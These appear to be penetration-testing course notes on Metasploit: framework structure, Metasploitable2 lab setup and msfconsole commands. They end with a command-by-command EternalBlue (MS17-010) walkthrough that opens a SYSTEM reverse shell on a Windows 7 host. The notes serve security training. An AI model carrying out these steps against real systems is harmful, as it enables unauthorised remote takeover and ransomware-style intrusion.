7. Basic use of Metasploit penetration testing framework

7.1 Metasploit testing framework

7.1.1 Introduction to Metasploit

- Metasploit is a penetration testing platform that lets you find, exploit and verify vulnerabilities. The platform includes the open-source Metasploit Framework and its commercial counterparts such as Metasploit Pro.

- Metasploit is a free, downloadable framework that makes it easy to exploit computer software vulnerabilities. It comes with professional-grade exploit tools for hundreds of known software vulnerabilities.

- Metasploit was originally designed as an attack tool development platform.

- Official website: https://www.metasploit.com/

7.1.2 Metasploit system framework

- 1. Basic libraries: The Metasploit basic library files live in the lib directory under the source root and include Rex, framework-core and framework-base.

- Rex is the most basic component, on which the entire framework depends: wrapped network sockets, client and server implementations of network application protocols, the logging subsystem, exploit support routines, PostgreSQL and MySQL database support, and so on.

- The framework-core library implements all the interfaces used to interact with the various types of upper-layer modules and plug-ins.

- The framework-base library extends framework-core, provides simpler wrapper routines and some functional classes for handling various aspects of the framework. It lets user interfaces and utility programs call the framework's own functions and the modules integrated into it.

- 2. Modules: Modules are organized into 6 types according to their purpose: auxiliary modules (Aux), exploit modules (Exploits), post-exploitation modules (Post), payload modules (Payloads), encoder modules (Encoders) and NOP modules (Nops).

- [Note] A payload is also called an attack load. It is mainly used to establish a stable connection between the target machine and the attacking machine. It can return a shell and can also perform program injection and similar tasks.

- 3. Plug-ins: Plug-ins extend the framework's functions, or assemble existing functions into components with advanced features. Plug-ins can integrate existing external security tools, such as the Nessus and OpenVAS vulnerability scanners, and provide new functions to the user interface.

- 4. Interfaces: the msfconsole terminal, the msfcli command line, the msfgui graphical interface, the Armitage graphical interface and the msfapi remote-call interface.

- 5. Utility programs: Metasploit also provides a series of programs that can be run directly, letting penetration testers and security staff quickly use the framework's internal capabilities for specific tasks. For example, msfpayload, msfencode and msfvenom can package payloads as executable files, C source, JavaScript and other forms, and can apply various kinds of encoding.

7.1.3 Metasploit directory structure

# ls /usr/share/metasploit-framework
data: editable files used by Metasploit
documentation: documentation for the framework
lib: framework code library
modules: the actual MSF modules
plugins: plugins that can be loaded at runtime
scripts: Meterpreter and other scripts
tools: various useful command-line tools

7.2 Metasploitable2-Linux target system introduction

7.2.1 Metasploitable2-Linux target machine introduction

- The Metasploitable2 virtual system is a specially crafted Ubuntu operating system, itself designed as a security training tool for testing and demonstrating attacks on common vulnerabilities.

Download from the official site: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

7.2.2 Metasploitable2 installation

Unzip the archive first --> Open VMware --> [Open a Virtual Machine] --> Select the .vmx file --> choose [I Copied It] when prompted --> Log in as the normal user (user: msfadmin, password: msfadmin)

-- Modify a user's password
$ sudo passwd username

-- Switch to root
$ su root
Password: 218853

-- Configure the network (static IP)
# vim /etc/network/interfaces
----------
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.1.180
netmask 255.255.255.0
gateway 192.168.1.1
----------
-- Restart the network
# /etc/init.d/networking restart

-- Be sure to take a snapshot of the initial environment!!!

7.3 Basic usage of Metasploit

- The Metasploit program requires a PostgreSQL database.

PostgreSQL overview

- PostgreSQL is a free-software object-relational database management system (ORDBMS) with a very complete feature set. It is based on POSTGRES version 4.2, developed at the Department of Computer Science of the University of California.

- Official website: https://www.postgresql.org/

- Kali already ships with a PostgreSQL database environment.

- PostgreSQL describes itself as the world's most advanced open-source relational database.

-- Start the PostgreSQL service
# systemctl start postgresql

-- Set PostgreSQL to start automatically at boot
# systemctl enable postgresql

-- Launch Metasploit
Application menu: 08 - Exploitation Tools --> metasploit framework
Terminal: # msfconsole

-- help command
> help
Core Commands                  core commands (*)
Module Commands                module commands (*)
Job Commands                   background task commands (*)
Resource Script Commands       resource script commands
Database Backend Commands      database backend commands
Credentials Backend Commands   credential backend commands
Developer Commands             developer commands
Common commands
-- 1. The connect command (core commands)
The connect command is mainly used to connect to a remote host, usually during intranet penetration.
> connect xxxx.cn 80 //Connect to port 80 on the target
[*] Connected to xxxx.cn:80 //This message means the connection succeeded
get //Submit a GET request; the response reveals the server version
-- 2. Module-related show commands
Valid parameters for the show command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options.
- Example 1. List all exploit modules in the Metasploit framework
> show exploits
- Example 2. List all payloads in the Metasploit framework
> show payloads
- Example 3. List all auxiliary modules in the Metasploit framework
> show auxiliary

-- 3. Module-related search command (avoids the long wait of show, which lists everything)
> search <service or module name> (such as mysql)
> search <vulnerability> (such as ms08_067)
- Search by name
> search name:<service or module name>
..... (returned columns: Name: module name, Disclosure Date: release date, Rank: reliability level, Check: whether the module can check for the vulnerability before exploiting it, Description: description)
- Search by path
> search path:<service or module name>
- Narrow the search by platform (results generally have a higher rank)
> search platform:<platform> (e.g. windows, linux)
[Note] platform = target platform

     -- 3.1 Search by type
The type keyword is used here
type: a specific type of module (exploit, payload, auxiliary, encoder, evasion, post, or nop)
> search type:<module type>
[exploit] exploit module
[auxiliary] auxiliary module

     -- 3.2 Combined search
Example: > search type:exploit name:mysql

     -- 3.3 Search for exploit modules by CVE
> search cve:CVE-2017-8464
- Example: view Linux-related vulnerability modules from 2021
> search cve:2021 name:linux
\t

[Note] Rank

- Each exploit module carries a Rank field based on its potential impact on the target system.

- Users can search, classify and sort exploit modules by Rank.

- Ranks in descending order of reliability:

Excellent: The exploit will never crash the target service; this covers SQL injection, command execution, remote file inclusion, local file inclusion and the like. Typical memory corruption exploits are not rated at this level unless there are extraordinary circumstances.

Great: The exploit has a default target and can either automatically detect the appropriate target or fall back to a specific return address after a version check of the target service.

Good: The exploit has a default target and that target is the "common case" for this type of software (Windows 7 for desktop applications, Server 2012 for servers, etc.).

Normal: The exploit is reliable, but it is version-specific and the version cannot be reliably auto-detected.

Average: The exploit is generally unreliable or difficult to exploit.

Low: The exploit is almost unexploitable (or succeeds less than 50% of the time) on common platforms.

Manual: The exploit is unstable or difficult to exploit and is essentially a denial of service (DoS). This level is also used for modules that are useless unless the user specifically configures them.
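To make the search output columns (Name, Disclosure Date, Rank, Check, Description) and the Rank ordering above concrete, here is an added Python example; it is not part of the original notes and not Metasploit code. It parses constructed msfconsole `search` rows and orders them from most to least reliable; the module names and rows in SAMPLE are constructed, not real search results.

```python
import re

# Reliability order from the Rank section, most reliable first.
RANK_ORDER = ["excellent", "great", "good", "normal", "average", "low", "manual"]

# One `search` result row: index, name, optional disclosure date, rank, check, description.
_ROW = re.compile(
    r"^\s*(?P<idx>\d+)\s+(?P<name>\S+)\s+"
    r"(?:(?P<date>\d{4}-\d{2}-\d{2})\s+)?"
    r"(?P<rank>excellent|great|good|normal|average|low|manual)\s+"
    r"(?P<check>Yes|No)\s+(?P<desc>.+?)\s*$"
)

# Constructed sample in the layout msfconsole prints for `search type:exploit name:smb`
# (hypothetical module names and descriptions, not real modules).
SAMPLE = """\
Matching Modules
================

   #  Name                                   Disclosure Date  Rank     Check  Description
   -  ----                                   ---------------  ----     -----  -----------
   0  exploit/windows/smb/example_alpha      2017-03-14       average  Yes    Constructed row A
   1  exploit/windows/smb/example_beta       2008-10-28       great    Yes    Constructed row B
   2  auxiliary/scanner/smb/example_check                     normal   No     Constructed row C
"""


def parse_search(text):
    """Return one dict per module row; the header and rule lines do not match and are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            d = m.groupdict()
            d["idx"] = int(d["idx"])
            d["check"] = d["check"] == "Yes"   # Check column: module can verify before exploiting
            rows.append(d)
    return rows


def by_reliability(rows):
    """Sort parsed rows most reliable first; any unknown rank sorts last."""
    def key(r):
        return RANK_ORDER.index(r["rank"]) if r["rank"] in RANK_ORDER else len(RANK_ORDER)
    return sorted(rows, key=key)


def checkable(rows):
    """Rows whose module supports the check command (Check == Yes)."""
    return [r for r in rows if r["check"]]
```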

[Note] CVE Overview

- CVE stands for Common Vulnerabilities and Exposures. CVE works like a dictionary: it gives a public name to each widely recognised, publicly disclosed information security vulnerability or weakness. A common name lets users share data between separate vulnerability databases and assessment tools that are otherwise hard to integrate, which makes the CVE name a "keyword" for security information sharing. If a vulnerability report specifies a CVE name, the corresponding patch information can quickly be found in any other CVE-compatible database.

- Vocabulary: Vulnerabilities = weaknesses; Exposures = exposures.

- [Expansion] A metasploit-framework exploit module for CVE-2017-8464 was published on GitHub in 2017. The module was tested on Windows 10 x64 (Build 14393) and works.

-- 4. Module-related command: use
[Background] The ms08_067 vulnerability was disclosed by Microsoft in 2008. If an affected system receives a specially crafted RPC request, the vulnerability may allow remote code execution. On Windows 2000, Windows XP and Windows Server 2003, an attacker may exploit it to run arbitrary code without authentication.
- 1. First find the ms08_067 module you want
> search ms08_067
- 2. Load the exploit module
> use <module name>
//After use loads the module, the msfconsole prompt changes to show the module; the module can then be configured and run.
> back //Exit the current module
-- 5. Module-related command: info
info displays information about a module
- Method 1: > info <module name>
  Example: > info exploit/windows/smb/ms08_067_netapi
- Method 2: after loading the module with use, type > info directly
-- Set the RHOSTS option to specify the target machine
> set RHOSTS xxx.xxx.xxx.xxx

-- View the current option values
> show options

-- Type exploit or run to execute the module
> exploit
> run

[Note] Do not use exit to leave a module: exit quits the whole Metasploit program.

7.4 Use msf to penetrate and attack Win7 hosts and execute commands remotely

7.4.1 Experimental environment

- EternalBlue: on the evening of 14 April 2017 the hacker group Shadow Brokers released a large number of network attack tools, including the "EternalBlue" tool. "EternalBlue" exploits an SMB vulnerability in Windows to obtain the highest system privileges. On 12 May criminals built the WannaCry ransomware by modifying "EternalBlue". Many university intranets, large corporate intranets and government private networks in the UK, Russia, Europe and China were infected, and victims were asked to pay a high ransom to decrypt their files.

Windows SMB is used for file sharing (port 445: the file sharing protocol).

Official description https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

- EternalBlue-related malware exploits Microsoft's MS17-010 vulnerability. MS17-010 is a vulnerability in an underlying Windows service. The malicious code scans for Windows machines with the 445 file sharing port open; no user action is required. As long as the computer is on and connected to the network, criminals can implant ransomware, Trojans, cryptocurrency miners and other malicious programs, and remotely control computers and servers.

7.4.2 Obtain the Win7 host remote shell through the msf module

- 1. Scan for the ms17-010 vulnerability
# msfconsole //Open the exploitation tool
> search ms17-010 //Find modules related to the vulnerability (auxiliary modules scan for it, exploit modules attack it)
> use <module name> //Load an auxiliary module (for example .../scanner/...)
> show options //View which options need to be configured (Required shows whether it must be set; the port defaults to 445)
> set RHOSTS xxx.xxx.xxx.xxx //Set the target host
> run //A [+] line in the output means the host is vulnerable
> back //Exit the module

- 2. If the vulnerability exists, configure the options and carry out the attack
> search ms17-010 //Find the exploit module (eternalblue)
> use ... //Load the EternalBlue exploit module
> show options //View which options need to be configured (Required shows whether it must be set; the port defaults to 445)
> set RHOSTS xxx.xxx.xxx.xxx //Set the target host
> show targets //View the operating systems the module supports
> show payloads //List all compatible payloads (using search to find one is recommended)
> search windows/x64/shell //Find applicable payloads
> set payload ... //Configure the payload (windows/x64/shell/reverse_tcp)
> show options //View the configuration (LHOST: local host, LPORT: local port; 4444 is the listening port used to catch the reverse shell)
> set LHOST xxx.xxx.xxx.xxx //Configure the local host
> show options //View the configuration again to confirm the changes
> run //=-WIN-= in the output means execution succeeded (press Enter to get the Windows command line)

- 3. Remote command execution
system/> chcp 65001 //Fix garbled characters when Linux displays Windows command output
system/> whoami //Check the current privileges (highest privilege: SYSTEM)
system/> [Ctrl] + C //Disconnect the session

- 4. Extended operations
> exploit -j //Run as a background job; the session is kept after it is established
> sessions //List saved sessions
> sessions -i <session id> //Enter a session
system/> background //Send the session to the background (leave it without disconnecting)
> sessions -k <session id> //Kill the session with the given id
> sessions -h //View sessions-related help

Summary: Steps to use metasploit attack

1. Find vulnerabilities published by CVE

2. Find the corresponding exploit module

3. Configure module parameters

4. Set the payload (the backdoor delivered to the target)

5. Execute run or exploit to start the attack